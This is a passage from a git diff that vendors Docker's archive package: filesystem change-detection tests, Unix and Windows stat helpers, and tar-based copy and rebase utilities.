ioutil.TempDir("", "docker-hardlink-test-src-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(src) + for _, name := range names { + func() { + fh, err := os.Create(path.Join(src, name)) + if err != nil { + t.Fatal(err) + } + defer fh.Close() + if _, err = fh.Write(msg); err != nil { + t.Fatal(err) + } + }() + } + // Create dest, with changes that includes hardlinks + dest, err := ioutil.TempDir("", "docker-hardlink-test-dest-") + if err != nil { + t.Fatal(err) + } + os.RemoveAll(dest) // we just want the name, at first + if err := copyDir(src, dest); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dest) + for _, name := range names { + for i := 0; i < 5; i++ { + if err := os.Link(path.Join(dest, name), path.Join(dest, fmt.Sprintf("%s.link%d", name, i))); err != nil { + t.Fatal(err) + } + } + } + + // get changes + changes, err := ChangesDirs(dest, src) + if err != nil { + t.Fatal(err) + } + + // sort + sort.Sort(changesByPath(changes)) + + // ExportChanges + ar, err := ExportChanges(dest, changes, nil, nil) + if err != nil { + t.Fatal(err) + } + hdrs, err := walkHeaders(ar) + if err != nil { + t.Fatal(err) + } + + // reverse sort + sort.Sort(sort.Reverse(changesByPath(changes))) + // ExportChanges + arRev, err := ExportChanges(dest, changes, nil, nil) + if err != nil { + t.Fatal(err) + } + hdrsRev, err := walkHeaders(arRev) + if err != nil { + t.Fatal(err) + } + + // line up the two sets + sort.Sort(tarHeaders(hdrs)) + sort.Sort(tarHeaders(hdrsRev)) + + // compare Size and LinkName + for i := range hdrs { + if hdrs[i].Name != hdrsRev[i].Name { + t.Errorf("headers - expected name %q; but got %q", hdrs[i].Name, hdrsRev[i].Name) + } + if hdrs[i].Size != hdrsRev[i].Size { + t.Errorf("headers - %q expected size %d; but got %d", hdrs[i].Name, hdrs[i].Size, hdrsRev[i].Size) + } + if hdrs[i].Typeflag != hdrsRev[i].Typeflag { + t.Errorf("headers - %q expected type %d; but got %d", hdrs[i].Name, hdrs[i].Typeflag, hdrsRev[i].Typeflag) + } + if hdrs[i].Linkname != hdrsRev[i].Linkname { + t.Errorf("headers - %q expected linkname %q; but got %q", hdrs[i].Name, hdrs[i].Linkname, hdrsRev[i].Linkname) + } + } + +} + +type tarHeaders []tar.Header + +func (th tarHeaders) Len() int { return len(th) } +func (th tarHeaders) Swap(i, j int) { th[j], th[i] = th[i], th[j] } +func (th tarHeaders) Less(i, j int) bool { return th[i].Name < th[j].Name } + +func walkHeaders(r io.Reader) ([]tar.Header, error) { + t := tar.NewReader(r) + headers := []tar.Header{} + for { + hdr, err := t.Next() + if err != nil { + if err == io.EOF { + break + } + return headers, err + } + headers = append(headers, *hdr) + } + return headers, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_test.go b/vendor/github.com/docker/docker/pkg/archive/changes_test.go new file mode 100644 index 0000000000..eae1d022c7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/changes_test.go @@ -0,0 +1,572 @@ +package archive + +import ( + "io/ioutil" + "os" + "os/exec" + "path" + "runtime" + "sort" + "testing" + "time" + + "github.com/docker/docker/pkg/system" +) + +func max(x, y int) int { + if x >= y { + return x + } + return y +} + +func copyDir(src, dst string) error { + cmd := exec.Command("cp", "-a", src, dst) + if runtime.GOOS == "solaris" { + cmd = exec.Command("gcp", "-a", src, dst) + } + + if err := cmd.Run(); err != nil { + return err + } + return nil +} + +type FileType uint32 + +const ( + Regular FileType = iota + Dir + Symlink +) + +type FileData struct { + filetype FileType + path string + contents string + permissions os.FileMode +} + +func createSampleDir(t *testing.T, root string) { + files := []FileData{ + {Regular, "file1", "file1\n", 0600}, + {Regular, "file2", "file2\n", 0666}, + {Regular, "file3", "file3\n", 0404}, + {Regular, "file4", "file4\n", 0600}, + {Regular, "file5", "file5\n", 0600}, + {Regular, "file6", "file6\n", 0600}, + {Regular, "file7", "file7\n", 0600}, + {Dir, "dir1", "", 0740}, + {Regular, "dir1/file1-1", "file1-1\n", 01444}, + {Regular, "dir1/file1-2", "file1-2\n", 0666}, + {Dir, "dir2", "", 0700}, + {Regular, "dir2/file2-1", "file2-1\n", 0666}, + {Regular, "dir2/file2-2", "file2-2\n", 0666}, + {Dir, "dir3", "", 0700}, + {Regular, "dir3/file3-1", "file3-1\n", 0666}, + {Regular, "dir3/file3-2", "file3-2\n", 0666}, + {Dir, "dir4", "", 0700}, + {Regular, "dir4/file3-1", "file4-1\n", 0666}, + {Regular, "dir4/file3-2", "file4-2\n", 0666}, + {Symlink, "symlink1", "target1", 0666}, + {Symlink, "symlink2", "target2", 0666}, + {Symlink, "symlink3", root + "/file1", 0666}, + {Symlink, "symlink4", root + "/symlink3", 0666}, + {Symlink, "dirSymlink", root + "/dir1", 0740}, + } + + now := time.Now() + for _, info := range files { + p := path.Join(root, info.path) + if info.filetype == Dir { + if err := os.MkdirAll(p, info.permissions); err != nil { + t.Fatal(err) + } + } else if info.filetype == Regular { + if err := ioutil.WriteFile(p, []byte(info.contents), info.permissions); err != nil { + t.Fatal(err) + } + } else if info.filetype == Symlink { + if err := os.Symlink(info.contents, p); err != nil { + t.Fatal(err) + } + } + + if info.filetype != Symlink { + // Set a consistent ctime, atime for all files and dirs + if err := system.Chtimes(p, now, now); err != nil { + t.Fatal(err) + } + } + } +} + +func TestChangeString(t *testing.T) { + modifiyChange := Change{"change", ChangeModify} + toString := modifiyChange.String() + if toString != "C change" { + t.Fatalf("String() of a change with ChangeModifiy Kind should have been %s but was %s", "C change", toString) + } + addChange := Change{"change", ChangeAdd} + toString = addChange.String() + if toString != "A change" { + t.Fatalf("String() of a change with ChangeAdd Kind should have been %s but was %s", "A change", toString) + } + deleteChange := Change{"change", ChangeDelete} + toString = deleteChange.String() + if toString != "D change" { + t.Fatalf("String() of a change with ChangeDelete Kind should have been %s but was %s", "D change", toString) + } +} + +func TestChangesWithNoChanges(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. + if runtime.GOOS == "windows" { + t.Skip("symlinks on Windows") + } + rwLayer, err := ioutil.TempDir("", "docker-changes-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rwLayer) + layer, err := ioutil.TempDir("", "docker-changes-test-layer") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(layer) + createSampleDir(t, layer) + changes, err := Changes([]string{layer}, rwLayer) + if err != nil { + t.Fatal(err) + } + if len(changes) != 0 { + t.Fatalf("Changes with no difference should have detect no changes, but detected %d", len(changes)) + } +} + +func TestChangesWithChanges(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. + if runtime.GOOS == "windows" { + t.Skip("symlinks on Windows") + } + // Mock the readonly layer + layer, err := ioutil.TempDir("", "docker-changes-test-layer") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(layer) + createSampleDir(t, layer) + os.MkdirAll(path.Join(layer, "dir1/subfolder"), 0740) + + // Mock the RW layer + rwLayer, err := ioutil.TempDir("", "docker-changes-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rwLayer) + + // Create a folder in RW layer + dir1 := path.Join(rwLayer, "dir1") + os.MkdirAll(dir1, 0740) + deletedFile := path.Join(dir1, ".wh.file1-2") + ioutil.WriteFile(deletedFile, []byte{}, 0600) + modifiedFile := path.Join(dir1, "file1-1") + ioutil.WriteFile(modifiedFile, []byte{0x00}, 01444) + // Let's add a subfolder for a newFile + subfolder := path.Join(dir1, "subfolder") + os.MkdirAll(subfolder, 0740) + newFile := path.Join(subfolder, "newFile") + ioutil.WriteFile(newFile, []byte{}, 0740) + + changes, err := Changes([]string{layer}, rwLayer) + if err != nil { + t.Fatal(err) + } + + expectedChanges := []Change{ + {"/dir1", ChangeModify}, + {"/dir1/file1-1", ChangeModify}, + {"/dir1/file1-2", ChangeDelete}, + {"/dir1/subfolder", ChangeModify}, + {"/dir1/subfolder/newFile", ChangeAdd}, + } + checkChanges(expectedChanges, changes, t) +} + +// See https://github.com/docker/docker/pull/13590 +func TestChangesWithChangesGH13590(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. + if runtime.GOOS == "windows" { + t.Skip("symlinks on Windows") + } + baseLayer, err := ioutil.TempDir("", "docker-changes-test.") + defer os.RemoveAll(baseLayer) + + dir3 := path.Join(baseLayer, "dir1/dir2/dir3") + os.MkdirAll(dir3, 07400) + + file := path.Join(dir3, "file.txt") + ioutil.WriteFile(file, []byte("hello"), 0666) + + layer, err := ioutil.TempDir("", "docker-changes-test2.") + defer os.RemoveAll(layer) + + // Test creating a new file + if err := copyDir(baseLayer+"/dir1", layer+"/"); err != nil { + t.Fatalf("Cmd failed: %q", err) + } + + os.Remove(path.Join(layer, "dir1/dir2/dir3/file.txt")) + file = path.Join(layer, "dir1/dir2/dir3/file1.txt") + ioutil.WriteFile(file, []byte("bye"), 0666) + + changes, err := Changes([]string{baseLayer}, layer) + if err != nil { + t.Fatal(err) + } + + expectedChanges := []Change{ + {"/dir1/dir2/dir3", ChangeModify}, + {"/dir1/dir2/dir3/file1.txt", ChangeAdd}, + } + checkChanges(expectedChanges, changes, t) + + // Now test changing a file + layer, err = ioutil.TempDir("", "docker-changes-test3.") + defer os.RemoveAll(layer) + + if err := copyDir(baseLayer+"/dir1", layer+"/"); err != nil { + t.Fatalf("Cmd failed: %q", err) + } + + file = path.Join(layer, "dir1/dir2/dir3/file.txt") + ioutil.WriteFile(file, []byte("bye"), 0666) + + changes, err = Changes([]string{baseLayer}, layer) + if err != nil { + t.Fatal(err) + } + + expectedChanges = []Change{ + {"/dir1/dir2/dir3/file.txt", ChangeModify}, + } + checkChanges(expectedChanges, changes, t) +} + +// Create a directory, copy it, make sure we report no changes between the two +func TestChangesDirsEmpty(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. + // TODO Should work for Solaris + if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { + t.Skip("symlinks on Windows; gcp failure on Solaris") + } + src, err := ioutil.TempDir("", "docker-changes-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(src) + createSampleDir(t, src) + dst := src + "-copy" + if err := copyDir(src, dst); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dst) + changes, err := ChangesDirs(dst, src) + if err != nil { + t.Fatal(err) + } + + if len(changes) != 0 { + t.Fatalf("Reported changes for identical dirs: %v", changes) + } + os.RemoveAll(src) + os.RemoveAll(dst) +} + +func mutateSampleDir(t *testing.T, root string) { + // Remove a regular file + if err := os.RemoveAll(path.Join(root, "file1")); err != nil { + t.Fatal(err) + } + + // Remove a directory + if err := os.RemoveAll(path.Join(root, "dir1")); err != nil { + t.Fatal(err) + } + + // Remove a symlink + if err := os.RemoveAll(path.Join(root, "symlink1")); err != nil { + t.Fatal(err) + } + + // Rewrite a file + if err := ioutil.WriteFile(path.Join(root, "file2"), []byte("fileNN\n"), 0777); err != nil { + t.Fatal(err) + } + + // Replace a file + if err := os.RemoveAll(path.Join(root, "file3")); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(path.Join(root, "file3"), []byte("fileMM\n"), 0404); err != nil { + t.Fatal(err) + } + + // Touch file + if err := system.Chtimes(path.Join(root, "file4"), time.Now().Add(time.Second), time.Now().Add(time.Second)); err != nil { + t.Fatal(err) + } + + // Replace file with dir + if err := os.RemoveAll(path.Join(root, "file5")); err != nil { + t.Fatal(err) + } + if err := os.MkdirAll(path.Join(root, "file5"), 0666); err != nil { + t.Fatal(err) + } + + // Create new file + if err := ioutil.WriteFile(path.Join(root, "filenew"), []byte("filenew\n"), 0777); err != nil { + t.Fatal(err) + } + + // Create new dir + if err := os.MkdirAll(path.Join(root, "dirnew"), 0766); err != nil { + t.Fatal(err) + } + + // Create a new symlink + if err := os.Symlink("targetnew", path.Join(root, "symlinknew")); err != nil { + t.Fatal(err) + } + + // Change a symlink + if err := os.RemoveAll(path.Join(root, "symlink2")); err != nil { + t.Fatal(err) + } + if err := os.Symlink("target2change", path.Join(root, "symlink2")); err != nil { + t.Fatal(err) + } + + // Replace dir with file + if err := os.RemoveAll(path.Join(root, "dir2")); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(path.Join(root, "dir2"), []byte("dir2\n"), 0777); err != nil { + t.Fatal(err) + } + + // Touch dir + if err := system.Chtimes(path.Join(root, "dir3"), time.Now().Add(time.Second), time.Now().Add(time.Second)); err != nil { + t.Fatal(err) + } +} + +func TestChangesDirsMutated(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. + // TODO Should work for Solaris + if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { + t.Skip("symlinks on Windows; gcp failures on Solaris") + } + src, err := ioutil.TempDir("", "docker-changes-test") + if err != nil { + t.Fatal(err) + } + createSampleDir(t, src) + dst := src + "-copy" + if err := copyDir(src, dst); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(src) + defer os.RemoveAll(dst) + + mutateSampleDir(t, dst) + + changes, err := ChangesDirs(dst, src) + if err != nil { + t.Fatal(err) + } + + sort.Sort(changesByPath(changes)) + + expectedChanges := []Change{ + {"/dir1", ChangeDelete}, + {"/dir2", ChangeModify}, + {"/dirnew", ChangeAdd}, + {"/file1", ChangeDelete}, + {"/file2", ChangeModify}, + {"/file3", ChangeModify}, + {"/file4", ChangeModify}, + {"/file5", ChangeModify}, + {"/filenew", ChangeAdd}, + {"/symlink1", ChangeDelete}, + {"/symlink2", ChangeModify}, + {"/symlinknew", ChangeAdd}, + } + + for i := 0; i < max(len(changes), len(expectedChanges)); i++ { + if i >= len(expectedChanges) { + t.Fatalf("unexpected change %s\n", changes[i].String()) + } + if i >= len(changes) { + t.Fatalf("no change for expected change %s\n", expectedChanges[i].String()) + } + if changes[i].Path == expectedChanges[i].Path { + if changes[i] != expectedChanges[i] { + t.Fatalf("Wrong change for %s, expected %s, got %s\n", changes[i].Path, changes[i].String(), expectedChanges[i].String()) + } + } else if changes[i].Path < expectedChanges[i].Path { + t.Fatalf("unexpected change %s\n", changes[i].String()) + } else { + t.Fatalf("no change for expected change %s != %s\n", expectedChanges[i].String(), changes[i].String()) + } + } +} + +func TestApplyLayer(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. + // TODO Should work for Solaris + if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { + t.Skip("symlinks on Windows; gcp failures on Solaris") + } + src, err := ioutil.TempDir("", "docker-changes-test") + if err != nil { + t.Fatal(err) + } + createSampleDir(t, src) + defer os.RemoveAll(src) + dst := src + "-copy" + if err := copyDir(src, dst); err != nil { + t.Fatal(err) + } + mutateSampleDir(t, dst) + defer os.RemoveAll(dst) + + changes, err := ChangesDirs(dst, src) + if err != nil { + t.Fatal(err) + } + + layer, err := ExportChanges(dst, changes, nil, nil) + if err != nil { + t.Fatal(err) + } + + layerCopy, err := NewTempArchive(layer, "") + if err != nil { + t.Fatal(err) + } + + if _, err := ApplyLayer(src, layerCopy); err != nil { + t.Fatal(err) + } + + changes2, err := ChangesDirs(src, dst) + if err != nil { + t.Fatal(err) + } + + if len(changes2) != 0 { + t.Fatalf("Unexpected differences after reapplying mutation: %v", changes2) + } +} + +func TestChangesSizeWithHardlinks(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. + if runtime.GOOS == "windows" { + t.Skip("hardlinks on Windows") + } + srcDir, err := ioutil.TempDir("", "docker-test-srcDir") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(srcDir) + + destDir, err := ioutil.TempDir("", "docker-test-destDir") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(destDir) + + creationSize, err := prepareUntarSourceDirectory(100, destDir, true) + if err != nil { + t.Fatal(err) + } + + changes, err := ChangesDirs(destDir, srcDir) + if err != nil { + t.Fatal(err) + } + + got := ChangesSize(destDir, changes) + if got != int64(creationSize) { + t.Errorf("Expected %d bytes of changes, got %d", creationSize, got) + } +} + +func TestChangesSizeWithNoChanges(t *testing.T) { + size := ChangesSize("/tmp", nil) + if size != 0 { + t.Fatalf("ChangesSizes with no changes should be 0, was %d", size) + } +} + +func TestChangesSizeWithOnlyDeleteChanges(t *testing.T) { + changes := []Change{ + {Path: "deletedPath", Kind: ChangeDelete}, + } + size := ChangesSize("/tmp", changes) + if size != 0 { + t.Fatalf("ChangesSizes with only delete changes should be 0, was %d", size) + } +} + +func TestChangesSize(t *testing.T) { + parentPath, err := ioutil.TempDir("", "docker-changes-test") + defer os.RemoveAll(parentPath) + addition := path.Join(parentPath, "addition") + if err := ioutil.WriteFile(addition, []byte{0x01, 0x01, 0x01}, 0744); err != nil { + t.Fatal(err) + } + modification := path.Join(parentPath, "modification") + if err = ioutil.WriteFile(modification, []byte{0x01, 0x01, 0x01}, 0744); err != nil { + t.Fatal(err) + } + changes := []Change{ + {Path: "addition", Kind: ChangeAdd}, + {Path: "modification", Kind: ChangeModify}, + } + size := ChangesSize(parentPath, changes) + if size != 6 { + t.Fatalf("Expected 6 bytes of changes, got %d", size) + } +} + +func checkChanges(expectedChanges, changes []Change, t *testing.T) { + sort.Sort(changesByPath(expectedChanges)) + sort.Sort(changesByPath(changes)) + for i := 0; i < max(len(changes), len(expectedChanges)); i++ { + if i >= len(expectedChanges) { + t.Fatalf("unexpected change %s\n", changes[i].String()) + } + if i >= len(changes) { + t.Fatalf("no change for expected change %s\n", expectedChanges[i].String()) + } + if changes[i].Path == expectedChanges[i].Path { + if changes[i] != expectedChanges[i] { + t.Fatalf("Wrong change for %s, expected %s, got %s\n", changes[i].Path, changes[i].String(), expectedChanges[i].String()) + } + } else if changes[i].Path < expectedChanges[i].Path { + t.Fatalf("unexpected change %s\n", changes[i].String()) + } else { + t.Fatalf("no change for expected change %s != %s\n", expectedChanges[i].String(), changes[i].String()) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_unix.go b/vendor/github.com/docker/docker/pkg/archive/changes_unix.go new file mode 100644 index 0000000000..3778b732cf --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/changes_unix.go @@ -0,0 +1,36 @@ +// +build !windows + +package archive + +import ( + "os" + "syscall" + + "github.com/docker/docker/pkg/system" +) + +func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool { + // Don't look at size for dirs, its not a good measure of change + if oldStat.Mode() != newStat.Mode() || + oldStat.UID() != newStat.UID() || + oldStat.GID() != newStat.GID() || + oldStat.Rdev() != newStat.Rdev() || + // Don't look at size for dirs, its not a good measure of change + (oldStat.Mode()&syscall.S_IFDIR != syscall.S_IFDIR && + (!sameFsTimeSpec(oldStat.Mtim(), newStat.Mtim()) || (oldStat.Size() != newStat.Size()))) { + return true + } + return false +} + +func (info *FileInfo) isDir() bool { + return info.parent == nil || info.stat.Mode()&syscall.S_IFDIR != 0 +} + +func getIno(fi os.FileInfo) uint64 { + return uint64(fi.Sys().(*syscall.Stat_t).Ino) +} + +func hasHardlinks(fi os.FileInfo) bool { + return fi.Sys().(*syscall.Stat_t).Nlink > 1 +} diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_windows.go b/vendor/github.com/docker/docker/pkg/archive/changes_windows.go new file mode 100644 index 0000000000..af94243fc4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/changes_windows.go @@ -0,0 +1,30 @@ +package archive + +import ( + "os" + + "github.com/docker/docker/pkg/system" +) + +func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool { + + // Don't look at size for dirs, its not a good measure of change + if oldStat.ModTime() != newStat.ModTime() || + oldStat.Mode() != newStat.Mode() || + oldStat.Size() != newStat.Size() && !oldStat.IsDir() { + return true + } + return false +} + +func (info *FileInfo) isDir() bool { + return info.parent == nil || info.stat.IsDir() +} + +func getIno(fi os.FileInfo) (inode uint64) { + return +} + +func hasHardlinks(fi os.FileInfo) bool { + return false +} diff --git a/vendor/github.com/docker/docker/pkg/archive/copy.go b/vendor/github.com/docker/docker/pkg/archive/copy.go new file mode 100644 index 0000000000..0614c67cec --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/copy.go @@ -0,0 +1,458 @@ +package archive + +import ( + "archive/tar" + "errors" + "io" + "io/ioutil" + "os" + "path/filepath" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/system" +) + +// Errors used or returned by this file. +var ( + ErrNotDirectory = errors.New("not a directory") + ErrDirNotExists = errors.New("no such directory") + ErrCannotCopyDir = errors.New("cannot copy directory") + ErrInvalidCopySource = errors.New("invalid copy source content") +) + +// PreserveTrailingDotOrSeparator returns the given cleaned path (after +// processing using any utility functions from the path or filepath stdlib +// packages) and appends a trailing `/.` or `/` if its corresponding original +// path (from before being processed by utility functions from the path or +// filepath stdlib packages) ends with a trailing `/.` or `/`. If the cleaned +// path already ends in a `.` path segment, then another is not added. If the +// clean path already ends in a path separator, then another is not added. +func PreserveTrailingDotOrSeparator(cleanedPath, originalPath string) string { + // Ensure paths are in platform semantics + cleanedPath = normalizePath(cleanedPath) + originalPath = normalizePath(originalPath) + + if !specifiesCurrentDir(cleanedPath) && specifiesCurrentDir(originalPath) { + if !hasTrailingPathSeparator(cleanedPath) { + // Add a separator if it doesn't already end with one (a cleaned + // path would only end in a separator if it is the root). + cleanedPath += string(filepath.Separator) + } + cleanedPath += "." + } + + if !hasTrailingPathSeparator(cleanedPath) && hasTrailingPathSeparator(originalPath) { + cleanedPath += string(filepath.Separator) + } + + return cleanedPath +} + +// assertsDirectory returns whether the given path is +// asserted to be a directory, i.e., the path ends with +// a trailing '/' or `/.`, assuming a path separator of `/`. +func assertsDirectory(path string) bool { + return hasTrailingPathSeparator(path) || specifiesCurrentDir(path) +} + +// hasTrailingPathSeparator returns whether the given +// path ends with the system's path separator character. +func hasTrailingPathSeparator(path string) bool { + return len(path) > 0 && os.IsPathSeparator(path[len(path)-1]) +} + +// specifiesCurrentDir returns whether the given path specifies +// a "current directory", i.e., the last path segment is `.`. +func specifiesCurrentDir(path string) bool { + return filepath.Base(path) == "." +} + +// SplitPathDirEntry splits the given path between its directory name and its +// basename by first cleaning the path but preserves a trailing "." if the +// original path specified the current directory. +func SplitPathDirEntry(path string) (dir, base string) { + cleanedPath := filepath.Clean(normalizePath(path)) + + if specifiesCurrentDir(path) { + cleanedPath += string(filepath.Separator) + "." + } + + return filepath.Dir(cleanedPath), filepath.Base(cleanedPath) +} + +// TarResource archives the resource described by the given CopyInfo to a Tar +// archive. A non-nil error is returned if sourcePath does not exist or is +// asserted to be a directory but exists as another type of file. +// +// This function acts as a convenient wrapper around TarWithOptions, which +// requires a directory as the source path. TarResource accepts either a +// directory or a file path and correctly sets the Tar options. +func TarResource(sourceInfo CopyInfo) (content io.ReadCloser, err error) { + return TarResourceRebase(sourceInfo.Path, sourceInfo.RebaseName) +} + +// TarResourceRebase is like TarResource but renames the first path element of +// items in the resulting tar archive to match the given rebaseName if not "". +func TarResourceRebase(sourcePath, rebaseName string) (content io.ReadCloser, err error) { + sourcePath = normalizePath(sourcePath) + if _, err = os.Lstat(sourcePath); err != nil { + // Catches the case where the source does not exist or is not a + // directory if asserted to be a directory, as this also causes an + // error. + return + } + + // Separate the source path between its directory and + // the entry in that directory which we are archiving. + sourceDir, sourceBase := SplitPathDirEntry(sourcePath) + + filter := []string{sourceBase} + + logrus.Debugf("copying %q from %q", sourceBase, sourceDir) + + return TarWithOptions(sourceDir, &TarOptions{ + Compression: Uncompressed, + IncludeFiles: filter, + IncludeSourceDir: true, + RebaseNames: map[string]string{ + sourceBase: rebaseName, + }, + }) +} + +// CopyInfo holds basic info about the source +// or destination path of a copy operation. +type CopyInfo struct { + Path string + Exists bool + IsDir bool + RebaseName string +} + +// CopyInfoSourcePath stats the given path to create a CopyInfo +// struct representing that resource for the source of an archive copy +// operation. The given path should be an absolute local path. A source path +// has all symlinks evaluated that appear before the last path separator ("/" +// on Unix). As it is to be a copy source, the path must exist. +func CopyInfoSourcePath(path string, followLink bool) (CopyInfo, error) { + // normalize the file path and then evaluate the symbol link + // we will use the target file instead of the symbol link if + // followLink is set + path = normalizePath(path) + + resolvedPath, rebaseName, err := ResolveHostSourcePath(path, followLink) + if err != nil { + return CopyInfo{}, err + } + + stat, err := os.Lstat(resolvedPath) + if err != nil { + return CopyInfo{}, err + } + + return CopyInfo{ + Path: resolvedPath, + Exists: true, + IsDir: stat.IsDir(), + RebaseName: rebaseName, + }, nil +} + +// CopyInfoDestinationPath stats the given path to create a CopyInfo +// struct representing that resource for the destination of an archive copy +// operation. The given path should be an absolute local path. +func CopyInfoDestinationPath(path string) (info CopyInfo, err error) { + maxSymlinkIter := 10 // filepath.EvalSymlinks uses 255, but 10 already seems like a lot. + path = normalizePath(path) + originalPath := path + + stat, err := os.Lstat(path) + + if err == nil && stat.Mode()&os.ModeSymlink == 0 { + // The path exists and is not a symlink. + return CopyInfo{ + Path: path, + Exists: true, + IsDir: stat.IsDir(), + }, nil + } + + // While the path is a symlink. + for n := 0; err == nil && stat.Mode()&os.ModeSymlink != 0; n++ { + if n > maxSymlinkIter { + // Don't follow symlinks more than this arbitrary number of times. + return CopyInfo{}, errors.New("too many symlinks in " + originalPath) + } + + // The path is a symbolic link. We need to evaluate it so that the + // destination of the copy operation is the link target and not the + // link itself. This is notably different than CopyInfoSourcePath which + // only evaluates symlinks before the last appearing path separator. + // Also note that it is okay if the last path element is a broken + // symlink as the copy operation should create the target. + var linkTarget string + + linkTarget, err = os.Readlink(path) + if err != nil { + return CopyInfo{}, err + } + + if !system.IsAbs(linkTarget) { + // Join with the parent directory. + dstParent, _ := SplitPathDirEntry(path) + linkTarget = filepath.Join(dstParent, linkTarget) + } + + path = linkTarget + stat, err = os.Lstat(path) + } + + if err != nil { + // It's okay if the destination path doesn't exist. We can still + // continue the copy operation if the parent directory exists. + if !os.IsNotExist(err) { + return CopyInfo{}, err + } + + // Ensure destination parent dir exists. + dstParent, _ := SplitPathDirEntry(path) + + parentDirStat, err := os.Lstat(dstParent) + if err != nil { + return CopyInfo{}, err + } + if !parentDirStat.IsDir() { + return CopyInfo{}, ErrNotDirectory + } + + return CopyInfo{Path: path}, nil + } + + // The path exists after resolving symlinks. + return CopyInfo{ + Path: path, + Exists: true, + IsDir: stat.IsDir(), + }, nil +} + +// PrepareArchiveCopy prepares the given srcContent archive, which should +// contain the archived resource described by srcInfo, to the destination +// described by dstInfo. Returns the possibly modified content archive along +// with the path to the destination directory which it should be extracted to. +func PrepareArchiveCopy(srcContent io.Reader, srcInfo, dstInfo CopyInfo) (dstDir string, content io.ReadCloser, err error) { + // Ensure in platform semantics + srcInfo.Path = normalizePath(srcInfo.Path) + dstInfo.Path = normalizePath(dstInfo.Path) + + // Separate the destination path between its directory and base + // components in case the source archive contents need to be rebased. + dstDir, dstBase := SplitPathDirEntry(dstInfo.Path) + _, srcBase := SplitPathDirEntry(srcInfo.Path) + + switch { + case dstInfo.Exists && dstInfo.IsDir: + // The destination exists as a directory. No alteration + // to srcContent is needed as its contents can be + // simply extracted to the destination directory. + return dstInfo.Path, ioutil.NopCloser(srcContent), nil + case dstInfo.Exists && srcInfo.IsDir: + // The destination exists as some type of file and the source + // content is a directory. This is an error condition since + // you cannot copy a directory to an existing file location. + return "", nil, ErrCannotCopyDir + case dstInfo.Exists: + // The destination exists as some type of file and the source content + // is also a file. The source content entry will have to be renamed to + // have a basename which matches the destination path's basename. + if len(srcInfo.RebaseName) != 0 { + srcBase = srcInfo.RebaseName + } + return dstDir, RebaseArchiveEntries(srcContent, srcBase, dstBase), nil + case srcInfo.IsDir: + // The destination does not exist and the source content is an archive + // of a directory. The archive should be extracted to the parent of + // the destination path instead, and when it is, the directory that is + // created as a result should take the name of the destination path. + // The source content entries will have to be renamed to have a + // basename which matches the destination path's basename. + if len(srcInfo.RebaseName) != 0 { + srcBase = srcInfo.RebaseName + } + return dstDir, RebaseArchiveEntries(srcContent, srcBase, dstBase), nil + case assertsDirectory(dstInfo.Path): + // The destination does not exist and is asserted to be created as a + // directory, but the source content is not a directory. This is an + // error condition since you cannot create a directory from a file + // source. + return "", nil, ErrDirNotExists + default: + // The last remaining case is when the destination does not exist, is + // not asserted to be a directory, and the source content is not an + // archive of a directory. It this case, the destination file will need + // to be created when the archive is extracted and the source content + // entry will have to be renamed to have a basename which matches the + // destination path's basename. + if len(srcInfo.RebaseName) != 0 { + srcBase = srcInfo.RebaseName + } + return dstDir, RebaseArchiveEntries(srcContent, srcBase, dstBase), nil + } + +} + +// RebaseArchiveEntries rewrites the given srcContent archive replacing +// an occurrence of oldBase with newBase at the beginning of entry names. +func RebaseArchiveEntries(srcContent io.Reader, oldBase, newBase string) io.ReadCloser { + if oldBase == string(os.PathSeparator) { + // If oldBase specifies the root directory, use an empty string as + // oldBase instead so that newBase doesn't replace the path separator + // that all paths will start with. + oldBase = "" + } + + rebased, w := io.Pipe() + + go func() { + srcTar := tar.NewReader(srcContent) + rebasedTar := tar.NewWriter(w) + + for { + hdr, err := srcTar.Next() + if err == io.EOF { + // Signals end of archive. + rebasedTar.Close() + w.Close() + return + } + if err != nil { + w.CloseWithError(err) + return + } + + hdr.Name = strings.Replace(hdr.Name, oldBase, newBase, 1) + + if err = rebasedTar.WriteHeader(hdr); err != nil { + w.CloseWithError(err) + return + } + + if _, err = io.Copy(rebasedTar, srcTar); err != nil { + w.CloseWithError(err) + return + } + } + }() + + return rebased +} + +// CopyResource performs an archive copy from the given source path to the +// given destination path. The source path MUST exist and the destination +// path's parent directory must exist. +func CopyResource(srcPath, dstPath string, followLink bool) error { + var ( + srcInfo CopyInfo + err error + ) + + // Ensure in platform semantics + srcPath = normalizePath(srcPath) + dstPath = normalizePath(dstPath) + + // Clean the source and destination paths. + srcPath = 